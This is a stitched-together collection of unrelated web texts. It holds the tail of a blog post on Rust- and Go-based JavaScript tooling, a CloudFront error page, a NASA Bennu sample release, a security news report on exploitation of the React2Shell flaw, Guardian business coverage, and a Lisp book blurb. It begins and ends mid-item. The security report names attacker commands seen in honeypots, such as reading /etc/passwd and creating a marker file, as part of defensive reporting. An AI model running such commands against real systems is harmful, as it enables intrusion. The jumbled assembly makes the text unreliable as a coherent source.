extensive build pipelines.
JavaScript-based tools that were once "good enough" now struggle to keep up,
leading to sluggish build times, laggy editor experiences, and frustratingly
slow feedback loops.
That's where languages like Rust and Go come in. They offer native performance,
better memory management, and efficient concurrency — all of which translate into
tooling that's not just faster, but more reliable and scalable.
Rust, in particular, with its seemingly cult-like following, has become the language
of choice for much of this new wave. Its growing popularity has inspired a new
generation of developers who care deeply about correctness, speed, and user
experience. This has created a virtuous cycle where we get more tools and
faster innovation.
All of this points to a broader realization in the JavaScript world: if we want
tooling that scales with the demands of modern development, we have to look
beyond JavaScript itself.
Let's look at some of the most influential and promising tools redefining the
JavaScript developer experience: SWC, ESBuild, BiomeJS, Oxc, FNM/Volta, and TypeScript in Go.
1. SWC
SWC
was among the first major JavaScript
tools written in a language other than JavaScript itself (Rust), thus
establishing a pattern that many others would follow.
At its core, it provides a high-performance platform for JavaScript/TypeScript
transpilation, bundling, minification, and transformation through WebAssembly.
It has been largely successful in its goal of serving as a drop-in replacement
for Babel, delivering transpilation speeds up to 20x faster while maintaining
broad compatibility with most Babel configurations.
2. ESBuild
At a time when most developer tools were still being written in JavaScript, the
idea of using systems languages like Go or Rust was considered more of an
experiment than a trend.
But
ESBuild
changed that. In many ways, it sparked
a broader wave of interest in building faster, lower-level tools that could
dramatically improve the developer experience.
Created by Evan Wallace (former CTO of Figma), ESBuild was purpose-built to
replace legacy bundlers like Webpack and Rollup with a much faster, simpler
alternative. It achieves
10–100x faster performance
in tasks like bundling, minification, and transpilation due to its Go-backed
architecture.
Its speed, minimal configuration, and modern architecture have since influenced
a generation of tools and helped shift the expectations around what JavaScript
tooling
should
feel like, and for this reason, it remains the most adopted
non-JavaScript tool to date, with over 50 million weekly downloads on NPM.
3. BiomeJS
BiomeJS
is an ambitious Rust-based project that combines
code formatting and linting into a single high-performance JavaScript toolchain.
It benefits from Rust's multi-threaded architecture for dramatic speed gains
(up to ~100x faster depending on the hardware).
BiomeJS simplifies the development workflow by consolidating these functions
into a unified configuration system, eliminating the need to manage separate
tools with overlapping functionality.
Though it's still catching up to its more established counterparts in language
support and extensibility, it is an increasingly attractive option for anyone
seeking better performance and simpler tooling.
4. Oxc
A newer entrant to the field,
Oxc
is a collection of
Rust-based JavaScript tools focusing on linting, formatting, and transforming
JavaScript/TypeScript code.
It is part of the
VoidZero project
founded
by Evan You (creator of Vue.js and Vite), and aims to be the backbone for the
next-generation of JavaScript tooling.
Oxc's headline features include:
A JavaScript parser that's 3x faster than SWC.
A TypeScript/JSX transformer that's 20x to 50x faster than Babel.
An ESLint-compatible linter that runs significantly faster
(
~50-100x
).
oxlint has been a massive win for us at Shopify. Our previous linting setup
took 75 minutes to run, so we were fanning it out across 40+ workers in CI. By
comparison, oxlint takes around 10 seconds to lint the same codebase on a
single worker, and the output is easier to interpret. We even caught a few
bugs that were hidden or skipped by our old setup when we migrated!
Modern Node.js version management has greatly improved with tools like
Fast Node Manager (fnm)
and
Volta
, which are compelling alternatives
to
NVM
. Another option is
Mise
, which supports Node.js along with many other
development tools.
These Rust-based tools offer significantly faster shell initialization times and
full cross-platform support with a much smaller memory footprint.
They address long-standing pain points in NVM, such as sluggish startup and lack
of Windows compatibility, while adding conveniences like per-project version
switching and seamless global package management.
While it's still in active development, preliminary benchmarks already show
remarkable improvements
in build times (~10x for VS Code's codebase), editor startup speeds, and memory
usage.
This native port addresses TypeScript's scaling challenges in large codebases,
where developers previously had to compromise between snappy editor performance
and rich type feedback.
While some viewed the choice of Go over Rust as a missed opportunity, given the
latter's dominance in modern JavaScript tooling, the
rationale behind this decision
aligns well with the project's practical goals:
The existing code base makes certain assumptions -- specifically, it assumes
that there is automatic garbage collection -- and that pretty much limited our
choices. That heavily ruled out Rust. I mean, in Rust you have memory
management, but it's not automatic; you can get reference counting or whatever
you could, but then, in addition to that, there's the borrow checker and the
rather stringent constraints it puts on you around ownership of data
structures. In particular, it effectively outlaws cyclic data structures, and
all of our data structures are heavily cyclic.
— Anders Hejlsberg, creator of TypeScript
Microsoft intends to ship the Go-based implementation as TypeScript 7.0 in the
coming months, but
native previews
are already available for experimentation.
Beyond the clear performance gains, the rise of native tooling for JavaScript
brings deeper, ecosystem-wide implications.
With many established and upcoming tools now relying on entirely different
runtimes and ecosystems, contributing becomes less accessible to the majority of
JavaScript developers.
At the same time, this shift may influence the skill sets that developers choose
to pursue in the first place. While not everyone needs to write systems-level
code, understanding how these languages work and what they make possible will
drive even more innovative tooling in the coming years.
Unsurprisingly, although learning Rust or Zig presents a steeper barrier to
entry, developers overwhelmingly prefer faster tools (even if they're harder to
contribute to).
One other subtle, but important, tradeoff is the loss of dogfooding, where tool
creators stop using their own language to build their tools: which has
historically helped developers in tune with the experience they're shaping.
Moving to a different implementation language can weaken that feedback loop, and
while many projects are aware of this risk, the long-term impact of a lack of
dogfooding remains an open question.
The tools covered here represent just a slice of the growing ecosystem of
performance-focused, native-powered developer tools, and the momentum behind
this new wave is undeniable.
Other notable efforts in this space include
Turbopack and Turborepo
(from Vercel),
Dprint
(a Prettier alternative), and even
full-fledged runtimes like
Bun
(written in Zig) and
Deno
(Rust), which reimagine what's possible by rebuilding
JavaScript infrastructure from the ground up.
Together, these tools reflect a broader shift in the JavaScript world that makes
it clear that the future of JavaScript tooling is being written in Rust, Go,
Zig, and beyond.
Wrapping Up
In this post, we explored several tools driving a new wave of performance and innovation across the JavaScript ecosystem.
The performance revolution in JavaScript tooling is a fascinating case study in
ecosystem evolution.
Instead of being constrained by the limitations of JavaScript itself, the
community has pragmatically embraced other languages to push the boundaries of
what's possible.
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
Generated by cloudfront (CloudFront)
Request ID: tSxqIFLwq-zGt0UwyLUOUN3IqzK_QOVkLmdXIVOTFHQKsoqQW7LIDA==
Sugars, Gum, Stardust Found in NASA's Asteroid Bennu Samples
The asteroid Bennu continues to provide new clues to scientists’ biggest questions about the formation of the early solar system and the origins of life. As part of the ongoing study of pristine samples delivered to Earth by NASA’s OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, and Security-Regolith Explorer) spacecraft, three new papers published Tuesday by the journals Nature Geosciences and Nature Astronomy present remarkable discoveries: sugars essential for biology, a gum-like substance not seen before in astromaterials, and an unexpectedly high abundance of dust produced by supernova explosions.
Sugars essential to life
Scientists led by Yoshihiro Furukawa of Tohoku University in Japan found sugars essential for biology on Earth in the Bennu samples, detailing their findings in the journal
Nature Geoscience
. The five-carbon sugar ribose and, for the first time in an extraterrestrial sample, six-carbon glucose were found. Although these sugars are not evidence of life, their detection, along with
previous detections
of amino acids, nucleobases, and carboxylic acids in Bennu samples, show building blocks of biological molecules were widespread throughout the solar system.
For life on Earth, the sugars deoxyribose and ribose are key building blocks of DNA and RNA, respectively. DNA is the primary carrier of genetic information in cells. RNA performs numerous functions, and life as we know it could not exist without it. Ribose in RNA is used in the molecule’s sugar-phosphate “backbone” that connects a string of information-carrying nucleobases.
“All five nucleobases used to construct both DNA and RNA, along with phosphates, have already been found in the Bennu samples brought to Earth by OSIRIS-REx,” said Furukawa. “The new discovery of ribose means that all of the components to form the molecule RNA are present in Bennu.”
The discovery of ribose in asteroid samples is not a complete surprise. Ribose has previously been found in two
meteorites
recovered on Earth. What is important about the Bennu samples is that researchers did not find deoxyribose. If Bennu is any indication, this means ribose may have been more common than deoxyribose in environments of the early solar system.
Researchers think the presence of ribose and lack of deoxyribose supports the “RNA world” hypothesis, where the first forms of life relied on RNA as the primary molecule to store information and to drive chemical reactions necessary for survival.
“Present day life is based on a complex system organized primarily by three types of functional biopolymers: DNA, RNA, and proteins,” explains Furukawa. “However, early life may have been simpler. RNA is the leading candidate for the first functional biopolymer because it can store genetic information and catalyze many biological reactions.”
The Bennu samples also contained one of the most common forms of “food” (or energy) used by life on Earth, the sugar glucose, which is the first evidence that an important energy source for life as we know it was also present in the early solar system.
Mysterious, ancient ‘gum’
A second paper, in the journal
Nature Astronomy
led by Scott Sandford at NASA’s Ames Research Center in California’s Silicon Valley and Zack Gainsforth of the University of California, Berkeley, reveals a gum-like material in the Bennu samples never seen before in space rocks – something that could have helped set the stage on Earth for the ingredients of life to emerge. The surprising substance was likely formed in the early days of the solar system, as Bennu’s young parent asteroid warmed.
Once soft and flexible, but since hardened, this ancient “space gum” consists of polymer-like materials extremely rich in nitrogen and oxygen. Such complex molecules could have provided some of the chemical precursors that helped trigger life on Earth, and finding them in the pristine samples from Bennu is important for scientists studying how life began and whether it exists beyond our planet.
Scott SandFord
Astrophysicist, NASA's Ames Research Center
Bennu’s ancestral asteroid formed from materials in the solar nebula – the rotating cloud of gas and dust that gave rise to the solar system – and contained a variety of minerals and ices. As the asteroid began to warm, due to natural radiation, a compound called carbamate formed through a process involving ammonia and carbon dioxide. Carbamate is water soluble, but it survived long enough to polymerize, reacting with itself and other molecules to form larger and more complex chains impervious to water. This suggests that it formed before the parent body warmed enough to become a watery environment.
“With this strange substance, we’re looking at, quite possibly, one of the earliest alterations of materials that occurred in this rock,” said Sandford. “On this primitive asteroid that formed in the early days of the solar system, we’re looking at events near the beginning of the beginning.”
Using an infrared microscope, Sandford’s team selected unusual, carbon-rich grains containing abundant nitrogen and oxygen. They then began what Sandford calls “blacksmithing at the molecular level,” using the Molecular Foundry at Lawrence Berkeley National Laboratory (Berkeley Lab) in Berkeley, California. Applying ultra-thin layers of platinum, they reinforced a particle, welded on a tungsten needle to lift the tiny grain, and shaved the fragment down using a focused beam of charged particles.
When the particle was a thousand times thinner than a human hair, they analyzed its composition via electron microscopy at the Molecular Foundry and X-ray spectroscopy at Berkeley Lab’s Advanced Light Source. The ALS’s high spatial resolution and sensitive X-ray beams enabled unprecedented chemical analysis.
“We knew we had something remarkable the instant the images started to appear on the monitor,” said Gainsforth. “It was like nothing we had ever seen, and for months we were consumed by data and theories as we attempted to understand just what it was and how it could have come into existence.”
The team conducted a slew of experiments to examine the material’s characteristics. As the details emerged, the evidence suggested the strange substance had been deposited in layers on grains of ice and minerals present in the asteroid.
It was also flexible – a pliable material, similar to used gum or even a soft plastic. Indeed, during their work with the samples, researchers noticed the strange material was bendy and dimpled when pressure was applied. The stuff was translucent, and exposure to radiation made it brittle, like a lawn chair left too many seasons in the sun.
“Looking at its chemical makeup, we see the same kinds of chemical groups that occur in polyurethane on Earth,” said Sandford, “making this material from Bennu something akin to a ‘space plastic.’”
The ancient asteroid stuff isn’t simply polyurethane, though, which is an orderly polymer. This one has more “random, hodgepodge connections and a composition of elements that differs from particle to particle,” said Sandford. But the comparison underscores the surprising nature of the organic material discovered in NASA’s asteroid samples, and the research team aims to study more of it.
By pursuing clues about what went on long ago, deep inside an asteroid, scientists can better understand the young solar system – revealing the precursors to and ingredients of life it already contained, and how far those raw materials may have been scattered, thanks to asteroids much like Bennu.
Abundant supernova dust
Another paper in the journal
Nature Astronomy
, led by Ann Nguyen of NASA’s Johnson Space Center in Houston, analyzed presolar grains – dust from stars predating our solar system – found in two different rock types in the Bennu samples to learn more about where its parent body formed and how it was altered by geologic processes. It is believed that presolar dust was generally well-mixed as our solar system formed. The samples had six-times the amount of supernova dust than any other studied astromaterial, suggesting the asteroid’s parent body formed in a region of the
protoplanetary disk
enriched in the dust of dying stars.
The study also reveals that, while Bennu’s parent asteroid experienced extensive alteration by fluids, there are still pockets of less-altered materials within the samples that offer insights into its origin.
“These fragments retain a higher abundance of organic matter and presolar silicate grains, which are known to be easily destroyed by aqueous alteration in asteroids,” said Nguyen. “Their preservation in the Bennu samples was a surprise and illustrates that some material escaped alteration in the parent body. Our study reveals the diversity of presolar materials that the parent accreted as it was forming.”
NASA’s Goddard Space Flight Center provided overall mission management, systems engineering, and the safety and mission assurance for OSIRIS-REx. Dante Lauretta of the University of Arizona, Tucson, is the principal investigator. The university leads the science team and the mission’s science observation planning and data processing. Lockheed Martin Space in Littleton, Colorado, built the spacecraft and provided flight operations. Goddard and KinetX Aerospace were responsible for navigating the OSIRIS-REx spacecraft. Curation for OSIRIS-REx takes place at NASA’s Johnson Space Center in Houston. International partnerships on this mission include the OSIRIS-REx Laser Altimeter instrument from CSA (Canadian Space Agency) and asteroid sample science collaboration with JAXA’s (Japan Aerospace Exploration Agency’s) Hayabusa2 mission. OSIRIS-REx is the third mission in NASA’s New Frontiers Program, managed by NASA’s Marshall Space Flight Center in Huntsville, Alabama, for the agency’s Science Mission Directorate in Washington.
For more information on the OSIRIS-REx mission, visit:
React2Shell critical flaw actively exploited in China-linked attacks
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 11:26:07
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed. [...]...
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed.
React2Shell
is an insecure deserialization vulnerability in the React Server Components (RSC) 'Flight' protocol. Exploiting it does not require authentication and allows remote execution of JavaScript code in the server's context.
For the Next.js framework, there is the identifier CVE-2025-66478, but the tracking number was rejected in the National Vulnerability Database's CVE list as a duplicate of CVE-2025-55182.
The security issue is easy to leverage, and several proof-of-concept (PoC) exploits have already been published, increasing the risk of related threat activity.
The vulnerability spans several versions of the widely used library, potentially exposing thousands of dependent projects. Wiz researchers say that 39% of the cloud environments they can observe are susceptible to React2Shell attacks.
React and Next.js have released security updates, but the issue is trivially exploitable without authentication and in the default configuration.
React2Shell attacks underway
A report from Amazon Web Services (AWS) warns that the Earth Lamia and Jackpot Panda threat actors linked to China started to exploit React2Shell almost immediately after the public disclosure.
"Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda,"
reads the AWS report
.
AWS's honeypots also caught activity not attributed to any known clusters, but which still originates from China-based infrastructure.
Many of the attacking clusters share the same anonymization infrastructure, which further complicates individualized tracking and specific attribution.
Regarding the two identified threat groups, Earth Lamia focuses on exploiting web application vulnerabilities.
Typical targets include entities in the financial services, logistics, retail, IT companies, universities, and government sectors across Latin America, the Middle East, and Southeast Asia.
Jackpot Panda targets are usually located in East and Southeast Asia, and its attacks are aimed at collecting intelligence on corruption and domestic security.
PoCs now available
Lachlan Davidson, the researcher who discovered and reported React2Shell, warned about fake exploits circulating online. However, exploits confirmed as valid by Rapid7 researcher
Stephen Fewer
and Elastic Security's
Joe Desimone
have appeared on GitHub.
The attacks that AWS observed leverage a mix of public exploits, including broken ones, along with iterative manual testing and real-time troubleshooting against targeted environments.
The observed activity includes repeated attempts with different payloads, Linux command execution (
whoami
,
id
), attempts to create files (
/tmp/pwned.txt
), and attempts to read '
/etc/passwd/
.'
"This behavior demonstrates that threat actors aren't just running automated scans, but are actively debugging and refining their exploitation techniques against live targets," comment AWS researchers.
Attack surface management (ASM) platform Assetnote has released a
React2Shell scanner on GitHub
that can be used to determine if an environment is vulnerable to React2Shell.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Elon Musk’s X fined €120m by EU in first clash under new digital laws
Guardian
www.theguardian.com
2025-12-05 11:25:42
Ruling likely to put European Commission on collision course with billionaire, and possibly Donald Trump Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course wit...
Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the
European Commission
on a collision course with the US billionaire and potentially Donald Trump.
The breaches, under consideration for two years, included what the EU said was a “deceptive” blue tick verification badge given to users and the lack of transparency of the platform’s advertising.
The commission rules require tech companies to provide a public list of advertisers to ensure the company’s structures guard against illegal scams, fake advertisements and coordinated campaigns in the context of political elections.
In a third breach, the EU also concluded that
X
had failed to provide the required access to public data available to researchers, who typically keep tabs on contentious issues such as political content.
The ruling by the European Commission brings to a close part of an investigation that started two years ago.
The commission said on Friday it had found X in breach of transparency obligations under the Digital Services Act (DSA), in the first ruling against the company since the laws regulating the content of social media and large tech platforms came into force in 2023.
In December 2023, the commission
opened formal proceedings
to assess whether X may have breached the DSA in areas linked to the dissemination of illegal content and the effectiveness of the measures taken to combat information manipulation, for which the investigation continues.
Under the DSA, X can be fined up to 6% of its worldwide revenue, which was estimated to be between $2.5bn (£1.9bn) and $2.7bn in 2024.
Three other investigations remain, two of which relate to the content and the algorithms promoting content that changed after Musk bought Twitter in October 2022 and rebranded it X.
The commission continues to investigate whether there have been breaches of laws prohibiting incitement to violence or terrorism.
It is also looking into the mechanism for users to flag and report what they believe is illegal content.
Senior officials said the fine broke down into three sections: €45m for introducing a “verification” blue tick that users could buy, leaving others unable to determine the authenticity of account holders; €35m for breaches of ad regulations; and €40m for data access breaches in relation to research.
Before Musk took over Twitter, blue ticks were only awarded to verifiable account holders, including politicians, celebrities, public bodies and verified journalists in mainstream media and established new media, such as bloggers and YouTubers. After the takeover, users who subscribed to X Premium were then
eligible for blue tick status
.
Henna Virkkunen, who is the executive vice-president at the European Commission responsible for tech regulation, said: “With the DSA’s first non-compliance decision, we are holding X responsible for undermining users’ rights and evading accountability.
“Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU.”
The ruling risks enraging Trump’s administration. Last week the US commerce secretary, Howard Lutnick, said the EU must consider its tech regulations in order to get 50% tariffs on steel reduced.
His threats were branded “blackmail” by Teresa Ribera, the EU commissioner in charge of Europe’s green transition and antitrust enforcement.
Senior EU officials said the ruling was independent of any pleadings by the US delegation in Brussels last week to meet trade ministers. They said the EU retained its “sovereign right” to regulate US tech companies, with 25 businesses including non-US companies such as TikTok coming under the DSA.
Musk – who is
on a path to become the world’s first trillionaire
– has 90 days to come up with an “action plan” to respond to the fine but ultimately he is also free to appeal against any EU ruling, as others, such as Apple, have done in the past, taking their case to the European court of justice.
At the same time, the EU has announced it has secured commitments from TikTok to provide advertising repositories to address the commission concerns raised in May about transparency.
The DSA requires platforms to maintain an accessible and searchable repository of the ads running on their services to allow researchers and representatives of civil society “to detect scams, advertisements for illegal or age-inappropriate”.
Senior officials said the phenomenon of fake political adverts or ads with fake celebrities cannot be studied unless the social media companies stick to the rules.
X has been approached for comment. The EU said the company had been informed of the decision.
Cloudflare outage hits major web services including X, LinkedIn and Zoom – business live
Guardian
www.theguardian.com
2025-12-05 11:19:46
Cloudflare reports it is investigating issues with Cloudflare Dashboard and related APIs Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning. Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudfl...
Global websites down as Cloudflare investigates fresh issues
Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.
Cloudflare
said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other].
Cloudflare
has also reported it has implemented a potential fix to the issue and is monitoring the results.
But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.
Last month, an outage at Cloudflare made many websites inaccessible for about three hours.
Jake Moore
, global cybersecurity adviser at
ESET
, has summed up the problem:
“If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable.
“The problems often lie with the fact we are using an old network to direct internet users around the world to websites but it simply highlights there is one huge single point of failure in this legacy design.”
The Metro newspaper reports that shopping sites wer affected by the Cloudflare IT problems too – such as Shopify, Etsy, Wayfair, and H&M.
H&M’s website is slow to load right now, but the other three seem to be working…
Today’s Cloudflare outage is likely to intensify concerns that internet users are relying on too few technology providers.
Tim Wright,
technology partner at
Fladgate
, explains:
“Cloudflare’s latest outage is another reminder that much of the internet runs through just a few hands. Businesses betting on “always-on” cloud resilience are discovering its single points of failure. Repeated disruptions will draw tougher scrutiny from regulators given DORA, NIS2, and the UK’s emerging operational resilience regimes.
Dependence on a small set of intermediaries may be efficient but poses a structural risk the digital economy cannot ignore. We can expect regulators to probe the concentration of critical functions in the cloud and edge layers — while businesses rethink whether convenience has quietly outpaced control.”
Cloudflare
insists the problem was not a cyber attack; instead, it appears to have been caused by a deliberate change made by its firewall handles data requests, to fix a security vulnerability.
Cloudflare
says:
This incident has been resolved.
A change made to how Cloudflare’s Web Application Firewall parses requests caused Cloudflare’s network to be unavailable for several minutes this morning. This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today.
Edinburgh Airport suspends all flights after IT issue with air traffic control
An IT issue affecting air traffic control has forced Edinburgh Airport to halt all flights today.
Edinburgh Airport said in a statement:
“No flights are currently operating from Edinburgh Airport.
“Teams are working on the issue and will resolve as soon as possible.”
The Airport’s departure page
is showing eight flights delayed and five cancelled, but passengers for many other flights are being told to go to the gate.
Reports of problems at Cloudflare peaked at just after 9am UK time:
A chart showing reports of problems with Cloudflare
Photograph: Downdetector
Online video conferencing service Zoom, and Transport for London’s website (used for travel information in the capital), are among the sites hit by the Cloudflare outage.
Global websites down as Cloudflare investigates fresh issues
Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.
Cloudflare
said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other].
Cloudflare
has also reported it has implemented a potential fix to the issue and is monitoring the results.
But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.
Last month, an outage at Cloudflare made many websites inaccessible for about three hours.
In a separate cereal supply and demand report, the FAO raised its global cereal production forecast for 2025 to a record 3.003 billion metric tons.
That’s up from 2.990 billion tons projected last month, mainly due to increased estimates for wheat output.
The FAO’s forecast for world cereal stocks at the end of the 2025/26 season has also been revised up to a record 925.5 million tons, reflecting expectations of expanded wheat stocks in China and India as well as higher coarse grain stocks in exporting countries.
World food prices fall for third month in a row
Global food prices have fallen for the third month running.
The UN’s Food Price Index, which tracks a basket of food commodities, dropped by 1.2% in November, thanks to a drop in the cost of dairy products, meat, sugar and vegetable oils.
That could help to push down inflation, if these reductions are passed onto consumers.
Photograph: UN FAO
However, cereal prices rose by 1.8% last month, due to “potential Chinese interest in supplies from the United States of America, concerns over continuing hostilities in the Black Sea region, and expectations of reduced plantings in the Russian Federation”, the
UN’s Food and Agriculture Organisation
reports.
Vegetable oil prices
fell by 2.6% in the month, to a five-month low, due to prices of palm, rapeseed and sunflower oils.
Meat prices
dropped by 0.8%, driven by lower pig and poultry meat prices and the the removal of tariffs on beef imports into the US.
Photograph: UN FAO
Dairy prices
fell by 3.1% in November, thanks to rising milk production and abundant export supplies in key producing regions, supported by ample butter and skim milk powder inventories in the European Union and seasonally higher output in New Zealand.
Sugar prices
dropped by 5.9% in the month, and were almost 30% lower than a year ago., as expectations of ample global sugar supplies in the current season pushed down prices. Strong production in Brazil’s key southern growing regions, a good early season start to India’s harvest and favourable crop prospects in Thailand all contributed.
European shares higher ahead of US PCE inflation report
European stock markets are ending the week on the front foot.
The main European indices are a little higher this morning; Germany’s
DAX
is up 0.55%, France’s
CAC
40
is 0.3% higher, and the UK’s
FTSE
100
has risen by 0.14%.
Investors are waiting for new US inflation data later today (1.30pm UK time), which could influence interest rate expectations ahead of next week’s US Federal Reserve meeting.
Kyle Rodda,
senior financial market analyst at
capital
.
com,
says:
Risk assets are cautiously edging higher to round out the week, with US PCE Index data in focus this afternoon.
Ultimately, the markets appear to be looking for a signal that it’s all clear to keep moving higher again. That signal could come from data. But given the lack of it between now and the middle of next week, it’s more likely to come from the FOMC decision.
The current implied probabilities of a cut are 87%, according to FedWatch – swaps markets suggest a little higher. The markets won’t just want to see a cut delivered but also some dovish enough language and forecasts about the prospect of future cuts. Another hawkish cut, like that which was seen in October, could upset the apple cart, if it were to occur.
Nevertheless, European stocks have run with a broadly positive lead-in from Asian markets, with US futures also pointing higher
Netflix is in competition with Paramount Skydance and Comcast, which owns assets including Universal Studios and Sky, to buy the owner of the Hollywood studio
Warner Bros
, HBO and the HBO Max streaming service.
Netflix is offering a $5bn (£3.7bn) breakup fee if the deal fails to gain regulatory approval in the US, according to Bloomberg, which first reported the exclusive talks.
Ocado shares jump 11% after agreeing $350m payment from Kroger
Shares in Ocado have jumped by over 10% at the start of trading, after it agreed a compensation deal with US grocer Kroger.
Ocado is to receive a one-off $350m cash payment from
Kroger
, which decided last month to close three robotic warehouses which use the UK company’s high-tech equipment, in Maryland, Wisconsin, and Florida.
This morning, though, they’ve jumped to the top of the
FTSE
250 index, up 11.5% to 206p.
Ocado
had previously said it expected to receive more than $250m in compensation from
Kroger
.
But it has also revealed today that
Kroger
has decided to cancel another tie-up with Ocado – a planned automated distribution centre run on the UK group’s technology in Charlotte, North Carolina.
Last month, retail analyst
Clive
Black
of
Shore
Capital
said Ocado was “being marginalised as most of its customer fulfilment centres do not work economically in the USA”.
Ocado says it continues to “work closely” with Kroger on five other customer fulfillment centres in US states such as Texas and Michigan.
Tim Steiner
, CEO of
Ocado
Group
, has said:
“We continue to invest significant resources to support our partners at Kroger, and to help them build on our longstanding partnership. Ocado’s technology has evolved significantly to include both the new technologies that Kroger is currently deploying in its CFC network, as well as new fulfilment products that bring Ocado’s technology to a wider range of applications, including Store Based Automation to support ‘pick up’ and immediacy.”
Our partners around the world have already deployed a wide range of these fulfilment technologies to great effect, enabling them to address a wide spectrum of geographies, population densities and online shopping missions, underpinned by Ocado’s world leading expertise and R&D capabilities. We remain excited about the opportunity for Ocado’s evolving products in the US market.”
House prices predicted to rise in 2026, after budget uncertainty
Halifax’s Amanda Bryden
reckons UK house prices will rise “gradually” next year, saying:
“Looking ahead, with market activity steady and expectations of further interest rate reductions to come, we anticipate property prices will continue to grow gradually into 2026.”
Karen Noye
, mortgage expert at
Quilter
, says affordability remains the biggest hurdle, even though inflation has eased and another interest rate cut is expected later this month, adding:
The outlook for 2026 rests on the path of mortgage rates and the resilience of household incomes. Greater clarity post budget and the prospect of lower borrowing costs give the market a firmer footing, but affordability will remain the defining constraint.”
Tom Bill
, head of UK residential research at
Knight
Frank
, blames pre-Budget uncertainty pushed house price growth close to zero, adding:
Clarity has now returned, but an array of tax rises, which include an income tax threshold freeze, will increasingly squeeze demand and prices. Offsetting that is the fact that mortgage rates are expected to drift lower next year as the base rate bottoms out at around 3.25%.”
Technically, UK house prices did rise
slightly
last month. On Halifax’s data, the average price was £299,892, marginally up from £299,754 in October. That’s a new record high on this index.
Halifax: a clear North/South divide on house price changes
Halifax’s regional data continues to show a clear North/South divide – prices fell in the south of the UK last month, but were stronger elsewhere.
Northern Ireland
remains the strongest performing nation or region in the UK, with average property prices rising by +8.9% over the past year (up from +7.9% last month). The typical home now costs £220,716.
Scotland
recorded annual price growth of +3.7% in November, up to an average of £216,781. In
Wales
property values rose +1.9% year-on-year to £229,430.
In England, the
North
West
recorded the highest annual growth rate, with property prices rising by +3.2% to £245,070, followed by the
North
East
with growth of +2.9% to £180,939. Further south, three regions saw prices decrease in November.
In
London
prices fell by -1.0%, the
South
East
by -0.3% and
Eastern
England
by -0.1%. The capital remains the most expensive part of the UK, with an average property now costing £539,766.
Introduction: UK house prices stagnated in November, weak retail spending too
Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.
As the first week of December draws to a close, we have fresh evidence that the economy cooled in the run-up to last month’s budget.
UK house prices were broadly unchanged in November, lender
Halifax
reports, with that average property changing hands for £299,892. That stagnation follows a 0.5% rise in October, and makes houses slightly more affordable to new buyers.
On an annual basis, prices were 0.7% higher – down from +1.9% house price inflation in October.
Amanda Bryden
, head of mortgages at
Halifax
, explains:
“This consistency in average prices reflects what has been one of the most stable years for the housing market over the last decade. Even with the changes to Stamp Duty back in spring and some uncertainty ahead of the Autumn Budget, property values have remained steady.
While slower growth may disappoint some existing homeowners, it’s welcome news for first-time buyers. Comparing property prices to average incomes, affordability is now at its strongest since late 2015. Taking into account today’s higher interest rates, mortgage costs as a share of income are at their lowest level in around three years.
A chart showing UK house prices
Photograph: Halifax
Shoppers also reined in their spending in the shops last month.
A survey by business advisory service BDO has found that in-store sales grew by just +1.3% in November, despite the potential sales boost from Black Friday.
That is well below the rate of inflation which means that sales volumes are significantly down, BDO says.
The agenda
7am GMT: Halifax house price index for November
7am GMT: German factory orders data for October
8.30am GMT: UN food commodities price index
3pm GMT: US PCE inflation report
3pm GMT: University of Michigan consumer confidence report
LISP STYLE & DESIGN explores the process of style in the development of Lisp programs. Style comprises efficient algorithms. good organization. appropriate abstractions. well-constructed
function definitions, useful commentary. and effective debugging. Good design and style enhance programming efficiency because they make programs easier to understand, to debug, and to maintain.
A special feature of this book is the large programming example that the authors use throughout to illustrate how the process develops: organizing the approach, choosing constructs, using abstractions, structuring files, debugging code, and improving program efficiency. Lisp programmers, symbolic programmers or those intrigued by symbolic programming,
as well as students of Lisp should consider this book an essential addition to their libraries.
Molly M. Miller is Manager of Technical Publications and Training for Lucid, Inc. She holds degrees in Computer Science, Mathematics, and English and has done graduate work in symbolic and heuristic computation at Stanford University.
Eric Benson is Principal Scientist at Lucid, Inc. He is a graduate of the University of Utah with a degree in mathematics and is a co-founder of Lucid.
Home Office admits facial recognition tech issue with black and Asian subjects
Guardian
www.theguardian.com
2025-12-05 11:11:18
Calls for review after technology found to return more false positives for ‘some demographic groups’ on certain settingsUK politics live – latest updatesMinisters are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to ...
Ministers are facing calls for stronger safeguards on the use of facial recognition technology after the
Home Office
admitted it is more likely to incorrectly identify black and Asian people than their white counterparts on some settings.
